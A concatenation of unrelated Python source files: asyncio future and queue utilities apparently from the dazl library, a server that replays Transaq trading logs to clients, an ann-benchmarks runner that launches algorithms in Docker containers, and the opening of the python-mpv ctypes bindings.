stacklevel=2,
)
self._q = [] # type: Union[List[Tuple[T, Future]], AQueue[Tuple[T, Future]]]
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self._service_fut = safe_create_future()
self._prev_fut = None
# noinspection PyDeprecation
def put(self, value: T) -> Awaitable[None]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
fut = safe_create_future()
if isinstance(self._q, list):
self._q.append((value, fut))
else:
self._q.put_nowait((value, fut))
return fut
def start(self) -> None:
"""
Allow open asynchronous iterators to begin reading data from the queue. Calling this method
more than once has no effect.
"""
if not self._service_fut.done():
existing_items = cast(list, self._q) # type: List[Tuple[T, Future]]
self._q = AQueue()
for item in existing_items:
self._q.put_nowait(item)
self._service_fut.set_result(None)
def stop(self):
if not self._service_fut.done():
raise RuntimeError("Cannot stop an unstarted ServiceQueue")
loop = get_event_loop()
fut = loop.create_future()
self._q.put_nowait((None, fut))
return fut
def abort(self) -> Sequence[T_co]:
"""
Gracefully terminate the open iterator as quickly as possible and return all remaining
elements in the queue.
"""
async def next(self) -> Optional[T_co]:
if not self._service_fut.done():
await self._service_fut
if self._prev_fut is not None:
self._prev_fut.set_result(None)
self._prev_fut = None
q = cast(AQueue, self._q) # type: AQueue[Tuple[T_co, Future]]
value, fut = await q.get()
if value is None:
fut.set_result(None)
return None
else:
self._prev_fut = fut
return value
def __aiter__(self):
return self
async def __anext__(self):
value = await self.next()
if value is not None:
return value
else:
raise StopAsyncIteration
def __bool__(self):
return len(self) > 0
def __len__(self):
if isinstance(self._q, list):
return len(self._q)
else:
return self._q.qsize()
def __repr__(self):
return repr(self._q)
class ContextFreeFuture(Awaitable[T_co]):
"""
An awaitable whose loop is defined at the time of either a :meth:`set_result` call or an
`await`. These futures are more expensive than normal asyncio futures because they are
thread-safe.
"""
_result: Optional[T_co] = None
_exception: Optional[Exception] = None
_log_traceback = False
_asyncio_future_blocking = False
def __init__(self, *, loop: Optional[AbstractEventLoop] = None):
"""
Initialize the future.
The optional ``loop`` argument allows explicitly setting the event loop object used by the
        future. Unlike :class:`Future`, if it is not provided, the future does NOT have a loop set,
and it is assigned at the time that :class:`set_result` or an `await` expression is called,
or when :class:`set_loop` is explicitly called.
You may want to provide a loop ahead of time if you know it, and you're really only
utilizing this class for its thread-safe nature.
:param loop: An optional loop to assign to the :class:`ContextFreeFuture`.
"""
if loop is not None and not isinstance(loop, AbstractEventLoop):
raise ValueError("The provided loop must be a valid event loop")
from threading import RLock
self._lock = RLock()
self._callbacks = [] # type: List[Callable[[ContextFreeFuture[T_co]], None]]
self._state = _PENDING
self.__loop = loop # type: Optional[AbstractEventLoop]
self._source_traceback = None
@property
def _loop(self):
"""
Return the current loop.
Because many functions in the asyncio library directly attempt to access the loop of a
Future for validation purposes, it is necessary for this property to behave in strange ways.
If this property is accessed in a context where this is a currently running loop, this
Future will adopt the current running loop as its own, but ONLY if a loop has not yet been
set. This will usually do the right thing, but in some cases it may be necessary for callers
to invoke :meth:`set_loop` directly.
"""
if self.__loop is None:
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
# noinspection PyDeprecation
self.__loop = get_running_loop()
return self.__loop
def set_loop(self, loop: AbstractEventLoop) -> None:
"""
Set the loop affinity for this future.
It is an error to call this function more than once with different values for the loop.
:param loop:
"""
with self._lock:
if self.__loop is None:
self.__loop = loop
elif self.__loop is not loop:
raise InvalidStateError("This future is already associated with a specific loop.")
def cancel(self) -> bool:
"""
Cancel this future.
:return:
"""
with self._lock:
self._log_traceback = False
if self._state != _PENDING:
return False
self._state = _CANCELLED
self._schedule_callbacks()
return True
def set_result(self, result):
"""Mark the future done and set its result.
If the future is already done when this method is called, raises
InvalidStateError.
"""
with self._lock:
if self._state != _PENDING:
raise InvalidStateError("{}: {!r}".format(self._state, self))
self._result = result
self._state = _FINISHED
self._schedule_callbacks()
def set_exception(self, exception):
"""Mark the future done and set an exception.
If the future is already done when this method is called, raises
InvalidStateError.
"""
with self._lock:
if self._state != _PENDING:
raise InvalidStateError("{}: {!r}".format(self._state, self))
if isinstance(exception, type):
exception = exception()
if type(exception) is StopIteration:
raise TypeError(
"StopIteration interacts badly with generators "
"and cannot be raised into a Future"
)
self._exception = exception
self._state = _FINISHED
self._schedule_callbacks()
self._log_traceback = True
def add_done_callback(
self, fn: "Callable[[ContextFreeFuture[T_co]], None]", context=None
) -> None:
if context is not None:
# This used to be a warning, but in newer versions of Python a context
# is sometimes supplied and nothing seems to particularly go wrong by
# simply doing nothing with this information.
pass
with self._lock:
if self._loop is not None and self._state != _PENDING:
self._loop.call_soon_threadsafe(fn, self)
else:
self._callbacks.append(fn)
def _schedule_callbacks(self):
with self._lock:
if self.__loop is None:
self.__loop = get_event_loop()
# clear out the callbacks list and prevent further additions
local_callbacks = self._callbacks
self._callbacks = ()
for fn in local_callbacks:
self.__loop.call_soon_threadsafe(fn, self)
def cancelled(self):
"""Return True if the future was cancelled."""
with self._lock:
return self._state == _CANCELLED
# Don't implement running(); see http://bugs.python.org/issue18699
def done(self):
"""Return True if the future is done.
Done means either that a result / exception are available, or that the
future was cancelled.
"""
with self._lock:
return self._state != _PENDING
def result(self):
"""Return the result this future represents.
If the future has been cancelled, raises CancelledError. If the
future's result isn't yet available, raises InvalidStateError. If
the future is done and has an exception set, this exception is raised.
"""
with self._lock:
if self._state == _CANCELLED:
raise CancelledError
if self._state != _FINISHED:
raise InvalidStateError("Result is not ready.")
self._log_traceback = False
if self._exception is not None:
raise self._exception
return self._result
def exception(self):
"""Return the exception that was set on this future.
The exception (or None if no exception was set) is returned only if
the future is done. If the future has been cancelled, raises
CancelledError. If the future isn't done yet, raises
InvalidStateError.
"""
with self._lock:
if self._state == _CANCELLED:
raise CancelledError
if self._state != _FINISHED:
raise InvalidStateError("Exception is not set.")
self._log_traceback = False
return self._exception
def __await__(self) -> Generator[Any, None, T_co]:
if not self.done():
self._asyncio_future_blocking = True
yield self # This tells Task to wait for completion.
assert self.done(), "yield from wasn't used with future"
return self.result() # May raise too.
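# Illustrative sketch (not part of the original module): a ContextFreeFuture may be
# resolved from a plain worker thread and awaited on whichever loop is current.
async def _example_context_free_future():
    fut = ContextFreeFuture()  # type: ContextFreeFuture[str]
    fut.set_loop(get_event_loop())
    threading.Thread(target=fut.set_result, args=("done",)).start()
    return await fut  # -> "done"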
class DeferredStartTask:
"""
A :class:`Task`-like object that delays starting its coroutine until the :meth:`start` method is
called.
"""
_asyncio_future_blocking = False
def __init__(self, cb: Callable[[], Future], start=False, name=None):
if not callable(cb):
raise ValueError("cb must be callable")
if start:
self._future = cb()
self._callback = None
else:
self._future = get_event_loop().create_future()
self._callback = cb
# This is required to be compatible with the interface of a Future.
self._loop = self._future._loop
self._name = name or repr(cb)
def start(self) -> None:
"""
Actually invoke the underlying function (but only if it hasn't been invoked already).
"""
cb = self._callback
if cb is not None:
self._callback = None
propagate(from_=ensure_future(cb()), to=self._future)
def started(self) -> bool:
return self._callback is None
def cancelled(self) -> bool:
return self._future.cancelled()
def cancel(self) -> bool:
self._callback = None
return self._future.cancel()
def result(self) -> Any:
return self._future.result()
def done(self) -> bool:
return self._future.done()
def exception(self) -> Optional[BaseException]:
return self._future.exception()
def add_done_callback(self, callback: "Callable[[Future], Any]", context=None) -> None:
if context is None:
self._future.add_done_callback(callback)
else:
self._future.add_done_callback(callback, context=context) # type: ignore
def __await__(self):
return self._future.__await__()
def __repr__(self):
state = self._future._state if self.started() else "NOT_STARTED"
return f"DeferredStartTask({self._name!r}, state={state})"
@no_type_check
def get_running_loop() -> Optional[AbstractEventLoop]:
warnings.warn(
"get_running_loop() is deprecated, as support for Python 3.6 will be dropped in dazl 8. "
"Use Python 3.7+'s asyncio.get_running_loop() instead.",
DeprecationWarning,
)
try:
from asyncio import get_running_loop
try:
return get_running_loop()
except RuntimeError:
return None
except ImportError:
# noinspection PyProtectedMember
from asyncio import _get_running_loop
return _get_running_loop()
# noinspection PyDeprecation
def safe_create_future():
warnings.warn(
"safe_create_future() is deprecated; there is no planned replacement.",
DeprecationWarning,
stacklevel=2,
)
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
loop = get_running_loop()
return loop.create_future() if loop is not None else ContextFreeFuture()
@no_type_check
def named_gather(name: str, *awaitables, return_exceptions=False):
g = gather(*awaitables, return_exceptions=return_exceptions)
g.__repr__ = staticmethod(lambda _: f"<Gather {name}>")
return g
class Signal:
"""
A simple guard that "wakes" up a coroutine from another coroutine.
"""
# noinspection PyDeprecation
def __init__(self):
warnings.warn(
"Signal is deprecated; there is no planned replacement",
DeprecationWarning,
stacklevel=2,
)
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self._fut = safe_create_future()
def notify_all(self) -> None:
"""
Schedule a notification to all coroutines that are `wait`ing.
"""
if self._fut is not None:
self._fut.set_result(None)
self._fut = None
# noinspection PyDeprecation
def wait(self) -> "Awaitable[None]":
if self._fut is None:
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self._fut = safe_create_future()
return self._fut
class UnsettableEventLoopPolicy(AbstractEventLoopPolicy):
def get_event_loop(self) -> AbstractEventLoop:
raise Exception("Called get_event_loop")
def set_event_loop(self, loop: Optional[AbstractEventLoop]) -> None:
raise Exception("Called set_event_loop")
def new_event_loop(self) -> AbstractEventLoop:
raise Exception("Called new_event_loop")
def get_child_watcher(self) -> Any:
raise Exception("get_child_watcher")
def set_child_watcher(self, watcher: Any) -> None:
raise Exception("set_child_watcher")
|
TransaqReplayServer.py
|
# -*- coding: utf-8 -*-
"""
File: TransaqReplayServer.py
Author: Daniil Dolbilov
Created: 18-Oct-2020
"""
import logging
import threading
import time
from multiprocessing.connection import Listener
class TransaqReplayServer:
def __init__(self, xdf_file, host='localhost', port=7070, authkey=b'secret phrase'):
self.xdf_file = xdf_file
self.xdf_encoding = 'windows-1251'
self.skip_list = ['<pits>', '<securities>', '<sec_info_upd>']
self.host = host
self.port = port
self.authkey = authkey
def run_server(self):
logging.info('server: listen [%s:%s]...' % (self.host, self.port))
with Listener((self.host, self.port), authkey=self.authkey) as listener:
logging.info('server: listen started')
while True:
conn = listener.accept()
logging.info('server: client accepted [%s]' % conn._handle)
c_thread = threading.Thread(target=self.client_thread, args=(conn, ))
c_thread.start()
def client_thread(self, conn):
self.replay_events(conn)
logging.info('server: close [%s]' % conn._handle)
conn.close()
def replay_events(self, conn):
with open(self.xdf_file, mode='r', encoding=self.xdf_encoding) as f:
for line in f:
# === FORMAT SAMPLE ===
# 140551.705448 [4804] [0360] <cmd> [V] System version 6.06. TXmlConnector version 2.20.25
# 140551.718466 [4804] [0360] <cmd> [I] <command id="connect"><login> ...
# 140552.720939 [4804] [0360] <res> [R] <result success="true"/>
# 140553.019380 [4804] [clbk] <info> [O] [830u] <markets> ...
# 140553.353871 [4804] [clbk] <info> [O] [150770u] <securities><security secid="0" active="true"> ...
# 140605.644962 [4804] [clbk] <info> [O] [333u] <sec_info_upd><secid>29244</secid><seccode>BR55BJ0</seccode> ...
# 140605.645964 [4804] [clbk] <info> [O] [338u] <sec_info_upd><secid>29245</secid><seccode>BR55BV0</seccode> ...
# 140624.969489 [4804] [clbk] <info> [O] [4304u] <orders><order transactionid="195726"> ...
# 140624.973494 [4804] [clbk] <info> [O] [3540u] <trades><trade><secid>41824</secid> ...
# 140624.980504 [4804] [clbk] <info> [O] [6139u] <positions><forts_position><client> ...
# 140643.576875 [4804] [clbk] <info> [O] [861u] <quotations><quotation secid="32518"><board>FUT</board><seccode>SiZ0</seccode><last>78508</last><quantity>12</quantity> ...
# 140643.676021 [4804] [clbk] <info> [O] [862u] <quotations><quotation secid="32518"><board>FUT</board><seccode>SiZ0</seccode><last>78509</last><quantity>1</quantity> ...
ss = line.split(' ')
if len(ss) < 7 or ss[4] != '[O]':
logging.warning('SKIP: %s' % line.strip())
continue
header = ' '.join(ss[0:6])
xml_msg = line[len(header) + 1:].strip()
if xml_msg.startswith(tuple(self.skip_list)):
continue
# TODO: emulate pause between events (historical)
time.sleep(0.5)
msg_trimmed = xml_msg[:50] # data is very long, just log some chunk
if conn:
logging.debug('[%s] send: %s ...' % (conn._handle, msg_trimmed))
conn.send(xml_msg)
else:
logging.debug('no_conn: %s ...' % msg_trimmed)
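# Illustrative client sketch (an assumption, not part of the original file): the replayed XML
# messages can be consumed with multiprocessing.connection.Client using the same host, port
# and authkey as the server above.
def demo_replay_client(host='localhost', port=7070, authkey=b'secret phrase'):
    from multiprocessing.connection import Client
    with Client((host, port), authkey=authkey) as conn:
        try:
            while True:
                xml_msg = conn.recv()  # blocks until the server replays the next event
                logging.info('client: received %d chars' % len(xml_msg))
        except EOFError:
            logging.info('client: server closed the connection')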
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)-8s [%(name)s] %(message)s')
xdf_file = '../logs/2020.10.16-140551/20201016_xdf.log'
replayer = TransaqReplayServer(xdf_file)
replayer.run_server()
|
runner.py
|
import argparse
import datetime
import colors
import docker
import json
import multiprocessing
import numpy
import os
import psutil
import requests
import sys
import threading
import time
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import (Definition,
instantiate_algorithm,
get_algorithm_name)
from ann_benchmarks.distance import metrics, dataset_transform
from ann_benchmarks.results import store_results
def run_individual_query(algo, X_train, X_test, distance, count, run_count,
batch):
prepared_queries = \
(batch and hasattr(algo, "prepare_batch_query")) or \
((not batch) and hasattr(algo, "prepare_query"))
best_search_time = float('inf')
for i in range(run_count):
print('Run %d/%d...' % (i + 1, run_count))
        # a bit dumb, but this can't be a scalar because of Python's scoping rules
n_items_processed = [0]
def single_query(v):
if prepared_queries:
algo.prepare_query(v, count)
start = time.time()
algo.run_prepared_query()
total = (time.time() - start)
candidates = algo.get_prepared_query_results()
else:
start = time.time()
candidates = algo.query(v, count)
total = (time.time() - start)
return (total, v, candidates)
def batch_query(X):
if prepared_queries:
algo.prepare_batch_query(X, count)
start = time.time()
algo.run_batch_query()
total = (time.time() - start)
else:
start = time.time()
algo.batch_query(X, count)
total = (time.time() - start)
results = algo.get_batch_results()
candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa
for idx in single_results]
for v, single_results in zip(X, results)]
return [(total / float(len(X)), v) for v in candidates]
def get_candidates(result):
total, v, ids = result
candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa
for idx in ids]
n_items_processed[0] += 1
if n_items_processed[0] % 1000 == 0:
print('Processed %d/%d queries...' %
(n_items_processed[0], len(X_test)))
if len(candidates) > count:
print('warning: algorithm %s returned %d results, but count'
                      ' is only %d' % (algo, len(candidates), count))
return (total, candidates)
if batch:
results = batch_query(X_test)
handle_time = 0
else:
query_list = [single_query(x) for x in X_test]
handle_time, handled_list = algo.handle_query_list_result(query_list)
results = [get_candidates(l) for l in handled_list]
total_time = sum(time for time, _ in results) + handle_time
total_candidates = sum(len(candidates) for _, candidates in results)
search_time = total_time / len(X_test)
avg_candidates = total_candidates / len(X_test)
best_search_time = min(best_search_time, search_time)
verbose = hasattr(algo, "query_verbose")
attrs = {
"batch_mode": batch,
"best_search_time": best_search_time,
"candidates": avg_candidates,
"expect_extra": verbose,
"name": str(algo),
"run_count": run_count,
"distance": distance,
"count": int(count)
}
additional = algo.get_additional()
for k in additional:
attrs[k] = additional[k]
return (attrs, results)
def run(definition, dataset, count, run_count, batch):
algo = instantiate_algorithm(definition)
assert not definition.query_argument_groups \
or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor, definition.arguments)
D = get_dataset(dataset)
X_train = numpy.array(D['train'])
X_test = numpy.array(D['test'])
distance = D.attrs['distance']
print('got a train set of size (%d * %d)' % X_train.shape)
print('got %d queries' % len(X_test))
X_train = dataset_transform[distance](X_train)
X_test = dataset_transform[distance](X_test)
try:
prepared_queries = False
if hasattr(algo, "supports_prepared_queries"):
prepared_queries = algo.supports_prepared_queries()
t0 = time.time()
memory_usage_before = algo.get_memory_usage()
algo.fit(X_train)
build_time = time.time() - t0
index_size = algo.get_memory_usage() - memory_usage_before
print('Built index in', build_time)
print('Index size: ', index_size)
query_argument_groups = definition.query_argument_groups
# Make sure that algorithms with no query argument groups still get run
# once by providing them with a single, empty, harmless group
if not query_argument_groups:
query_argument_groups = [[]]
for pos, query_arguments in enumerate(query_argument_groups, 1):
print("Running query argument group %d of %d..." %
(pos, len(query_argument_groups)))
if query_arguments:
algo.set_query_arguments(*query_arguments)
descriptor, results = run_individual_query(
algo, X_train, X_test, distance, count, run_count, batch)
descriptor["build_time"] = build_time
descriptor["index_size"] = index_size
descriptor["algo"] = get_algorithm_name(
definition.algorithm, batch)
descriptor["dataset"] = dataset
store_results(dataset, count, definition,
query_arguments, descriptor, results, batch)
finally:
algo.done()
def run_from_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset',
choices=DATASETS.keys(),
required=True)
parser.add_argument(
'--algorithm',
required=True)
parser.add_argument(
'--module',
required=True)
parser.add_argument(
'--constructor',
required=True)
parser.add_argument(
'--count',
required=True,
type=int)
parser.add_argument(
'--runs',
required=True,
type=int)
parser.add_argument(
'--batch',
action='store_true')
parser.add_argument(
'build')
parser.add_argument(
'queries',
nargs='*',
default=[])
args = parser.parse_args()
algo_args = json.loads(args.build)
query_args = [json.loads(q) for q in args.queries]
definition = Definition(
algorithm=args.algorithm,
docker_tag=None, # not needed
module=args.module,
constructor=args.constructor,
arguments=algo_args,
query_argument_groups=query_args,
disabled=False
)
run(definition, args.dataset, args.count, args.runs, args.batch)
def run_docker(definition, dataset, count, runs, timeout, batch, cpu_limit,
mem_limit=None):
cmd = ['--dataset', dataset,
'--algorithm', definition.algorithm,
'--module', definition.module,
'--constructor', definition.constructor,
'--runs', str(runs),
'--count', str(count)]
if batch:
cmd += ['--batch']
cmd.append(json.dumps(definition.arguments))
cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
print('Running command', cmd)
client = docker.from_env()
if mem_limit is None:
mem_limit = psutil.virtual_memory().available
print('Memory limit:', mem_limit)
if batch:
cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1)
print('Running on CPUs:', cpu_limit)
container = client.containers.run(
definition.docker_tag,
cmd,
volumes={
os.path.abspath('ann_benchmarks'):
{'bind': '/home/app/ann_benchmarks', 'mode': 'ro'},
os.path.abspath('data'):
{'bind': '/home/app/data', 'mode': 'ro'},
os.path.abspath('results'):
{'bind': '/home/app/results', 'mode': 'rw'},
},
cpuset_cpus=cpu_limit,
mem_limit=mem_limit,
detach=True)
def stream_logs():
for line in container.logs(stream=True):
print(colors.color(line.decode().rstrip(), fg='blue'))
if sys.version_info >= (3, 0):
t = threading.Thread(target=stream_logs, daemon=True)
else:
t = threading.Thread(target=stream_logs)
t.daemon = True
t.start()
try:
exit_code = container.wait(timeout=timeout)
        # Exit quietly if the container completed successfully
if exit_code == 0:
return
elif exit_code is not None:
print(colors.color(container.logs().decode(), fg='red'))
            raise Exception('Child process failed with exit code %d' % exit_code)
finally:
container.remove(force=True)
|
mpv.py
|
# -*- coding: utf-8 -*-
# vim: ts=4 sw=4 et
#
# Python MPV library module
# Copyright (C) 2017-2020 Sebastian Götte <code@jaseg.net>
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
from ctypes import *
import ctypes.util
import threading
import os
import sys
from warnings import warn
from functools import partial, wraps
from contextlib import contextmanager
import collections
import re
import traceback
if os.name == 'nt':
dll = ctypes.util.find_library('mpv-1.dll')
if dll is None:
raise OSError('Cannot find mpv-1.dll in your system %PATH%. One way to deal with this is to ship mpv-1.dll '
'with your script and put the directory your script is in into %PATH% before "import mpv": '
'os.environ["PATH"] = os.path.dirname(__file__) + os.pathsep + os.environ["PATH"] '
'If mpv-1.dll is located elsewhere, you can add that path to os.environ["PATH"].')
backend = CDLL(dll)
fs_enc = 'utf-8'
else:
import locale
lc, enc = locale.getlocale(locale.LC_NUMERIC)
# libmpv requires LC_NUMERIC to be set to "C". Since messing with global variables everyone else relies upon is
# still better than segfaulting, we are setting LC_NUMERIC to "C".
locale.setlocale(locale.LC_NUMERIC, 'C')
sofile = ctypes.util.find_library('mpv')
if sofile is None:
raise OSError("Cannot find libmpv in the usual places. Depending on your distro, you may try installing an "
"mpv-devel or mpv-libs package. If you have libmpv around but this script can't find it, consult "
"the documentation for ctypes.util.find_library which this script uses to look up the library "
"filename.")
backend = CDLL(sofile)
fs_enc = sys.getfilesystemencoding()
class ShutdownError(SystemError):
pass
class MpvHandle(c_void_p):
pass
class MpvRenderCtxHandle(c_void_p):
pass
class MpvOpenGLCbContext(c_void_p):
pass
class PropertyUnavailableError(AttributeError):
pass
class ErrorCode(object):
"""For documentation on these, see mpv's libmpv/client.h."""
SUCCESS = 0
EVENT_QUEUE_FULL = -1
NOMEM = -2
UNINITIALIZED = -3
INVALID_PARAMETER = -4
OPTION_NOT_FOUND = -5
OPTION_FORMAT = -6
OPTION_ERROR = -7
PROPERTY_NOT_FOUND = -8
PROPERTY_FORMAT = -9
PROPERTY_UNAVAILABLE = -10
PROPERTY_ERROR = -11
COMMAND = -12
LOADING_FAILED = -13
AO_INIT_FAILED = -14
VO_INIT_FAILED = -15
NOTHING_TO_PLAY = -16
UNKNOWN_FORMAT = -17
UNSUPPORTED = -18
NOT_IMPLEMENTED = -19
GENERIC = -20
EXCEPTION_DICT = {
0: None,
-1: lambda *a: MemoryError('mpv event queue full', *a),
-2: lambda *a: MemoryError('mpv cannot allocate memory', *a),
-3: lambda *a: ValueError('Uninitialized mpv handle used', *a),
-4: lambda *a: ValueError('Invalid value for mpv parameter', *a),
-5: lambda *a: AttributeError('mpv option does not exist', *a),
-6: lambda *a: TypeError('Tried to set mpv option using wrong format', *a),
-7: lambda *a: ValueError('Invalid value for mpv option', *a),
-8: lambda *a: AttributeError('mpv property does not exist', *a),
# Currently (mpv 0.18.1) there is a bug causing a PROPERTY_FORMAT error to be returned instead of
# INVALID_PARAMETER when setting a property-mapped option to an invalid value.
-9: lambda *a: TypeError('Tried to get/set mpv property using wrong format, or passed invalid value', *a),
-10: lambda *a: PropertyUnavailableError('mpv property is not available', *a),
-11: lambda *a: RuntimeError('Generic error getting or setting mpv property', *a),
-12: lambda *a: SystemError('Error running mpv command', *a),
-14: lambda *a: RuntimeError('Initializing the audio output failed', *a),
-15: lambda *a: RuntimeError('Initializing the video output failed'),
-16: lambda *a: RuntimeError('There was no audio or video data to play. This also happens if the file '
'was recognized, but did not contain any audio or video streams, or no '
'streams were selected.'),
-17: lambda *a: RuntimeError('When trying to load the file, the file format could not be determined, '
'or the file was too broken to open it'),
-18: lambda *a: ValueError('Generic error for signaling that certain system requirements are not fulfilled'),
-19: lambda *a: NotImplementedError('The API function which was called is a stub only'),
-20: lambda *a: RuntimeError('Unspecified error') }
@staticmethod
def default_error_handler(ec, *args):
return ValueError(_mpv_error_string(ec).decode('utf-8'), ec, *args)
@classmethod
def raise_for_ec(kls, ec, func, *args):
ec = 0 if ec > 0 else ec
ex = kls.EXCEPTION_DICT.get(ec , kls.default_error_handler)
if ex:
raise ex(ec, *args)
MpvGlGetProcAddressFn = CFUNCTYPE(c_void_p, c_void_p, c_char_p)
class MpvOpenGLInitParams(Structure):
_fields_ = [('get_proc_address', MpvGlGetProcAddressFn),
('get_proc_address_ctx', c_void_p),
('extra_exts', c_void_p)]
def __init__(self, get_proc_address):
self.get_proc_address = get_proc_address
self.get_proc_address_ctx = None
self.extra_exts = None
class MpvOpenGLFBO(Structure):
_fields_ = [('fbo', c_int),
('w', c_int),
('h', c_int),
('internal_format', c_int)]
def __init__(self, w, h, fbo=0, internal_format=0):
self.w, self.h = w, h
self.fbo = fbo
self.internal_format = internal_format
class MpvRenderFrameInfo(Structure):
_fields_ = [('flags', c_int64),
('target_time', c_int64)]
def as_dict(self):
return {'flags': self.flags,
'target_time': self.target_time}
class MpvOpenGLDRMParams(Structure):
_fields_ = [('fd', c_int),
('crtc_id', c_int),
('connector_id', c_int),
('atomic_request_ptr', c_void_p),
('render_fd', c_int)]
class MpvOpenGLDRMDrawSurfaceSize(Structure):
_fields_ = [('width', c_int), ('height', c_int)]
class MpvOpenGLDRMParamsV2(Structure):
_fields_ = [('fd', c_int),
('crtc_id', c_int),
('connector_id', c_int),
('atomic_request_ptr', c_void_p),
('render_fd', c_int)]
def __init__(self, crtc_id, connector_id, atomic_request_ptr, fd=-1, render_fd=-1):
self.crtc_id, self.connector_id = crtc_id, connector_id
self.atomic_request_ptr = atomic_request_ptr
self.fd, self.render_fd = fd, render_fd
class MpvRenderParam(Structure):
_fields_ = [('type_id', c_int),
('data', c_void_p)]
# maps human-readable type name to (type_id, argtype) tuple.
# The type IDs come from libmpv/render.h
TYPES = {"invalid" :(0, None),
"api_type" :(1, str),
"opengl_init_params" :(2, MpvOpenGLInitParams),
"opengl_fbo" :(3, MpvOpenGLFBO),
"flip_y" :(4, bool),
"depth" :(5, int),
"icc_profile" :(6, bytes),
"ambient_light" :(7, int),
"x11_display" :(8, c_void_p),
"wl_display" :(9, c_void_p),
"advanced_control" :(10, bool),
"next_frame_info" :(11, MpvRenderFrameInfo),
"block_for_target_time" :(12, bool),
"skip_rendering" :(13, bool),
"drm_display" :(14, MpvOpenGLDRMParams),
"drm_draw_surface_size" :(15, MpvOpenGLDRMDrawSurfaceSize),
"drm_display_v2" :(16, MpvOpenGLDRMParamsV2)}
def __init__(self, name, value=None):
if name not in self.TYPES:
raise ValueError('unknown render param type "{}"'.format(name))
self.type_id, cons = self.TYPES[name]
if cons is None:
self.value = None
self.data = c_void_p()
elif cons is str:
self.value = value
self.data = cast(c_char_p(value.encode('utf-8')), c_void_p)
elif cons is bytes:
self.value = MpvByteArray(value)
self.data = cast(pointer(self.value), c_void_p)
elif cons is bool:
self.value = c_int(int(bool(value)))
self.data = cast(pointer(self.value), c_void_p)
elif cons is c_void_p:
self.value = value
self.data = cast(self.value, c_void_p)
else:
self.value = cons(**value)
self.data = cast(pointer(self.value), c_void_p)
def kwargs_to_render_param_array(kwargs):
t = MpvRenderParam * (len(kwargs)+1)
return t(*kwargs.items(), ('invalid', None))
class MpvFormat(c_int):
NONE = 0
STRING = 1
OSD_STRING = 2
FLAG = 3
INT64 = 4
DOUBLE = 5
NODE = 6
NODE_ARRAY = 7
NODE_MAP = 8
BYTE_ARRAY = 9
def __eq__(self, other):
return self is other or self.value == other or self.value == int(other)
def __repr__(self):
return ['NONE', 'STRING', 'OSD_STRING', 'FLAG', 'INT64', 'DOUBLE', 'NODE', 'NODE_ARRAY', 'NODE_MAP',
'BYTE_ARRAY'][self.value]
def __hash__(self):
return self.value
class MpvEventID(c_int):
NONE = 0
SHUTDOWN = 1
LOG_MESSAGE = 2
GET_PROPERTY_REPLY = 3
SET_PROPERTY_REPLY = 4
COMMAND_REPLY = 5
START_FILE = 6
END_FILE = 7
FILE_LOADED = 8
TRACKS_CHANGED = 9
TRACK_SWITCHED = 10
IDLE = 11
PAUSE = 12
UNPAUSE = 13
TICK = 14
SCRIPT_INPUT_DISPATCH = 15
CLIENT_MESSAGE = 16
VIDEO_RECONFIG = 17
AUDIO_RECONFIG = 18
METADATA_UPDATE = 19
SEEK = 20
PLAYBACK_RESTART = 21
PROPERTY_CHANGE = 22
CHAPTER_CHANGE = 23
ANY = ( SHUTDOWN, LOG_MESSAGE, GET_PROPERTY_REPLY, SET_PROPERTY_REPLY, COMMAND_REPLY, START_FILE, END_FILE,
FILE_LOADED, TRACKS_CHANGED, TRACK_SWITCHED, IDLE, PAUSE, UNPAUSE, TICK, SCRIPT_INPUT_DISPATCH,
CLIENT_MESSAGE, VIDEO_RECONFIG, AUDIO_RECONFIG, METADATA_UPDATE, SEEK, PLAYBACK_RESTART, PROPERTY_CHANGE,
CHAPTER_CHANGE )
def __repr__(self):
return ['NONE', 'SHUTDOWN', 'LOG_MESSAGE', 'GET_PROPERTY_REPLY', 'SET_PROPERTY_REPLY', 'COMMAND_REPLY',
'START_FILE', 'END_FILE', 'FILE_LOADED', 'TRACKS_CHANGED', 'TRACK_SWITCHED', 'IDLE', 'PAUSE', 'UNPAUSE',
'TICK', 'SCRIPT_INPUT_DISPATCH', 'CLIENT_MESSAGE', 'VIDEO_RECONFIG', 'AUDIO_RECONFIG',
'METADATA_UPDATE', 'SEEK', 'PLAYBACK_RESTART', 'PROPERTY_CHANGE', 'CHAPTER_CHANGE'][self.value]
@classmethod
def from_str(kls, s):
return getattr(kls, s.upper().replace('-', '_'))
identity_decoder = lambda b: b
strict_decoder = lambda b: b.decode('utf-8')
def lazy_decoder(b):
try:
return b.decode('utf-8')
except UnicodeDecodeError:
return b
class MpvNodeList(Structure):
def array_value(self, decoder=identity_decoder):
return [ self.values[i].node_value(decoder) for i in range(self.num) ]
def dict_value(self, decoder=identity_decoder):
return { self.keys[i].decode('utf-8'):
self.values[i].node_value(decoder) for i in range(self.num) }
class MpvByteArray(Structure):
_fields_ = [('data', c_void_p),
('size', c_size_t)]
def __init__(self, value):
self._value = value
self.data = cast(c_char_p(value), c_void_p)
self.size = len(value)
def bytes_value(self):
return cast(self.data, POINTER(c_char))[:self.size]
class MpvNode(Structure):
